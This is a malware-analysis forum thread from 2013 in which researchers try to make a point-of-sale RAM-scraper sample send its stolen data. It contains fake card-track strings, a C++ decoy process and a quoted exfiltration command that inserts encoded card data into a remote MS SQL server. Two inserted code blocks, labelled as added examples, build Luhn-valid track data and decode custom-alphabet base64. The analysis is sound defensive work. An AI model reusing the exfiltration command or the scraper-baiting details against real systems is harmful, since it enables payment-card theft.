A forum for reverse engineering, OS internals and malware analysis 

 #17944  by unixfreaxjp
 Thu Jan 31, 2013 2:48 pm
exitthematrix wrote:Does the exe send any TCP data encoded with that key in the registry?
↑This is actually a problem. I think that was the key, but I have no encrypted data caught to test this key itself.. (expected to be seen in network traffic) since somehow this thing is so shy and hasn't sent anything yet (even now still running).
I even made a script to run the malware process using net start|stop, and it works well to start/stop these two evil services, YET still no networking happens yet, rgds!
 #17946  by bsteo
 Thu Jan 31, 2013 3:01 pm
Do this with Notepad or whatever:
4744870016311111=14091010000000000072
%B4560710014901111^TEST JIM/BOGUS JOS^1107101169940000000710717906968?
And if that doesn't trigger it, just make a bogus "posw32.exe" that can keep those strings in memory, I think that should make it send data.

Idea:

posw32.cpp
Code:
#include <iostream>

using namespace std;

// Fake track data kept in writable global memory so a scraper walking this
// process's memory can find it (the strings from the Notepad test above).
char track1[100] = "%B4560710014901111^TEST JIM/BOGUS JOS^1107101169940000000710717906968?";
char track2[100] = "4744870016311111=14091010000000000072";

int main(){
	cout << track1 << endl;
	cout << track2 << endl;
	// Block on stdin instead of conio.h getch() so the same source builds with
	// MSVC, MinGW and Cygwin gcc; the process stays resident until Enter is pressed.
	cin.get();
	return 0;
}
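An added example, not code from the thread: a stand-in "posw32.exe" along the lines bsteo suggests, but generating properly delimited Track 1 / Track 2 records whose PANs pass the Luhn checksum. Whether this particular sample filters on Luhn is not established in the thread, but many card scrapers do, and both test PANs above (4744870016311111 and 4560710014901111) fail it, so a decoy that only carries those strings may never be considered worth exfiltrating. The cardholder name, expiry and payload digits below are constructed test values.

```cpp
// Added example (not from the thread): a decoy process that keeps Luhn-valid,
// correctly delimited Track 1 / Track 2 data resident in memory.
// All card numbers, names and dates here are constructed test values.
#include <cctype>
#include <initializer_list>
#include <iostream>
#include <string>
#include <vector>

// Luhn checksum (ISO/IEC 7812): true when the full PAN, check digit included, passes.
bool luhn_valid(const std::string& pan) {
    if (pan.empty()) return false;
    int sum = 0;
    bool dbl = false;  // every second digit counted from the right is doubled
    for (int i = static_cast<int>(pan.size()) - 1; i >= 0; --i) {
        if (!std::isdigit(static_cast<unsigned char>(pan[i]))) return false;
        int d = pan[i] - '0';
        if (dbl) { d *= 2; if (d > 9) d -= 9; }
        sum += d;
        dbl = !dbl;
    }
    return sum % 10 == 0;
}

// Append the Luhn check digit to a payload (the PAN minus its last digit).
std::string with_check_digit(const std::string& payload) {
    for (int c = 0; c <= 9; ++c) {
        std::string candidate = payload + static_cast<char>('0' + c);
        if (luhn_valid(candidate)) return candidate;
    }
    return "";  // not reached for all-digit input: exactly one check digit works
}

// Track 1, format B: %B<PAN>^<LAST/FIRST>^<YYMM><service code><discretionary>?
std::string make_track1(const std::string& pan, const std::string& name,
                        const std::string& yymm, const std::string& svc) {
    return "%B" + pan + "^" + name + "^" + yymm + svc + "0000000000000000?";
}

// Track 2: ;<PAN>=<YYMM><service code><discretionary>?
std::string make_track2(const std::string& pan, const std::string& yymm,
                        const std::string& svc) {
    return ";" + pan + "=" + yymm + svc + "0000000000000?";
}

// Build the resident records: the thread's two PANs with a corrected check
// digit, plus the well-known 4111... test number. Made-up expiry 14/09, service code 101.
std::vector<std::string> build_tracks() {
    const char* payloads[] = {"474487001631111", "456071001490111", "411111111111111"};
    std::vector<std::string> tracks;
    for (const char* p : payloads) {
        std::string pan = with_check_digit(p);
        tracks.push_back(make_track1(pan, "TEST JIM/BOGUS JOS", "1409", "101"));
        tracks.push_back(make_track2(pan, "1409", "101"));
    }
    return tracks;
}

int main() {
    // The thread's two test PANs fail Luhn; a scraper that filters on it skips them.
    for (const char* orig : {"4744870016311111", "4560710014901111"})
        std::cout << orig << " luhn=" << (luhn_valid(orig) ? "ok" : "FAIL") << '\n';
    for (const std::string& t : build_tracks()) std::cout << t << '\n';
    // Stay resident so a scraper walking this process's memory finds the strings.
    std::cout << "press Enter to exit\n";
    std::cin.get();
    return 0;
}
```

The decoy keeps the records in a std::vector on the heap rather than in a string literal, since some scrapers only walk writable (read/write) regions and skip the read-only .rdata section where literals land.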
 #17955  by unixfreaxjp
 Fri Feb 01, 2013 5:25 am
exitthematrix wrote:Do this with Notepad or whatever:
Nice idea, w/thanks for the Notepad stuff.. However it didn't work, believe me I did try.
I even injected those strings into memory directly :-) and it's still not sending anything on the network. What's wrong with this thing?? Since my environment still has this case running, please kindly advise anything to make this boo boo send calls to the mothership, with sincere regards.
PS: I am making that bogus with gcc now.. hope a cygwin-compiled bogus can fool this boo boo.
 #17957  by unixfreaxjp
 Fri Feb 01, 2013 6:35 am
unixfreaxjp wrote:
exitthematrix wrote:Do this with Notepad or whatever:
However it didn't work, believe me I did try.
I even flooded it :) see the pic below:
Image
The memory also full of those strings:
Image
Really wish to see a successful attempt with traffic.. I will need my test PC for testing other malware; in the meantime I keep it running with these boo boo..
 #17958  by bsteo
 Fri Feb 01, 2013 6:42 am
Very weird. Maybe it refuses to send anything to the mothership because it is under a VM? Or when executed it reads some registry keys to see whether that POS software version is installed or not?
 #17961  by unixfreaxjp
 Fri Feb 01, 2013 8:23 am
Very weird indeed, that's why I tried everything I can think of..
exitthematrix wrote:Very weird. Maybe it refuses to send anything to the mothership because it is under a VM?
I never use a VM. Always tested on a real machine :-)
exitthematrix wrote:Or when executed it reads some registry keys to see whether that POS software version is installed or not?
The only clue that it detects the POSW32.EXE program is:
Image
I didn't see it search the registry for posw32 so far (captured every detail of it though...)
Furthermore I still don't understand the nature of the infection; I tried to seek it out myself but the site was cleaned up, only the post in KM was my lead..
 #17962  by bsteo
 Fri Feb 01, 2013 8:50 am
If the malware fetches any data it sends it directly to an MS SQL Server as encoded data (looks like the first layer is some kind of base64 with a custom alphabet).

svchosts -S MFS1 -U sa -P -Q "INSERT INTO OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=xx.xxx.xxx.xxx,443;uid=sa;pwd=NevertHeL3ss', 'SELECT tab from rec..tbl') SELECT '%s'"

By the way, I saw many references to the string "Retalix" in your logs; Retalix is a POS software provider/supplier (http://www.retalix.com).
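An added example, not code from the thread or from the sample: the "base64 with a custom alphabet" first layer bsteo describes is a common trick, and the usual analyst move is to map the custom alphabet back onto the standard one so ordinary tools can decode it. The sample's actual alphabet is not given on this page, so SHUFFLED below is a constructed stand-in permutation and the wire payload is produced by the example's own encoder; the point is the mechanism and the tell-tale sign (decoding with the standard alphabet "works" but yields garbage).

```cpp
// Added example (not from the thread): base64 with an arbitrary alphabet, and
// the translate-to-standard shortcut used when recovering exfiltrated data.
// SHUFFLED is a constructed alphabet, not the sample's real one.
#include <cstdint>
#include <iostream>
#include <stdexcept>
#include <string>

static const std::string STD_ALPHABET =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

// Constructed stand-in: a permutation of the standard alphabet (assumption).
static const std::string SHUFFLED =
    "zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA9876543210/+";

// Encode bytes with any 64-character alphabet, '=' padding as in RFC 4648.
std::string b64_encode(const std::string& in, const std::string& alphabet) {
    if (alphabet.size() != 64) throw std::invalid_argument("alphabet must be 64 chars");
    std::string out;
    size_t i = 0;
    for (; i + 2 < in.size(); i += 3) {
        uint32_t v = ((uint8_t)in[i] << 16) | ((uint8_t)in[i + 1] << 8) | (uint8_t)in[i + 2];
        out += alphabet[v >> 18]; out += alphabet[(v >> 12) & 63];
        out += alphabet[(v >> 6) & 63]; out += alphabet[v & 63];
    }
    size_t rem = in.size() - i;
    if (rem == 1) {
        uint32_t v = (uint8_t)in[i] << 16;
        out += alphabet[v >> 18]; out += alphabet[(v >> 12) & 63]; out += "==";
    } else if (rem == 2) {
        uint32_t v = ((uint8_t)in[i] << 16) | ((uint8_t)in[i + 1] << 8);
        out += alphabet[v >> 18]; out += alphabet[(v >> 12) & 63];
        out += alphabet[(v >> 6) & 63]; out += '=';
    }
    return out;
}

// Decode with any 64-character alphabet. A character outside the alphabet
// throws, which is the quick test for "standard base64 or something custom?".
std::string b64_decode(const std::string& in, const std::string& alphabet) {
    if (alphabet.size() != 64) throw std::invalid_argument("alphabet must be 64 chars");
    int table[256];
    for (int& t : table) t = -1;
    for (int i = 0; i < 64; ++i) table[(uint8_t)alphabet[i]] = i;
    std::string out;
    uint32_t acc = 0;
    int bits = 0;  // number of not-yet-emitted bits held in acc
    for (char c : in) {
        if (c == '=') break;
        int v = table[(uint8_t)c];
        if (v < 0) throw std::invalid_argument(std::string("not in alphabet: ") + c);
        acc = (acc << 6) | (uint32_t)v;
        bits += 6;
        if (bits >= 8) { bits -= 8; out += (char)((acc >> bits) & 0xFF); }
    }
    return out;
}

// Analyst shortcut: rewrite a custom-alphabet string as standard base64 so
// off-the-shelf tools (base64 -d, CyberChef) decode it unchanged.
std::string to_standard(const std::string& in, const std::string& alphabet) {
    std::string out = in;
    for (char& c : out) {
        if (c == '=') continue;
        size_t pos = alphabet.find(c);
        if (pos == std::string::npos) throw std::invalid_argument("not in alphabet");
        c = STD_ALPHABET[pos];
    }
    return out;
}

int main() {
    std::string track2 = ";4744870016311119=1409101000000000?";  // constructed test record
    std::string wire = b64_encode(track2, SHUFFLED);
    std::cout << "on the wire:      " << wire << '\n';
    std::cout << "std decode (junk): " << b64_decode(wire, STD_ALPHABET) << '\n';
    std::cout << "as standard b64:  " << to_standard(wire, SHUFFLED) << '\n';
    std::cout << "decoded:          " << b64_decode(wire, SHUFFLED) << '\n';
    return 0;
}
```

When the alphabet is unknown, the usual way to recover it is to find the 64-byte table in the binary (it is typically referenced right next to the encoding loop) or to feed known plaintext through the sample and line the output up against the standard encoding position by position.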
 #17963  by unixfreaxjp
 Fri Feb 01, 2013 9:09 am
exitthematrix wrote:If the malware fetches any data it sends it directly to an MS SQL Server as encoded data (looks like the first layer is some kind of base64 with a custom alphabet).
Friend, please share with us "how" you knew all of this by using that sample, since I can't see any of this in the sample I tested and no traffic was reproduced.
Thanks for checking the captured logs; yes, I also realized that Retalix is the POS maker.
 #17966  by unixfreaxjp
 Fri Feb 01, 2013 9:47 am
 #17968  by bsteo
 Fri Feb 01, 2013 10:05 am
unixfreaxjp wrote:
exitthematrix wrote:If the malware fetches any data it sends it directly to an MS SQL Server as encoded data (looks like the first layer is some kind of base64 with a custom alphabet).
Friend, please share with us "how" you knew all of this by using that sample, since I can't see any of this in the sample I tested and no traffic was reproduced.
Thanks for checking the captured logs; yes, I also realized that Retalix is the POS maker.
aassfxxx above did a good job but not complete.

http://aassfxxx.infos.st/article21/pos- ... m-scrapper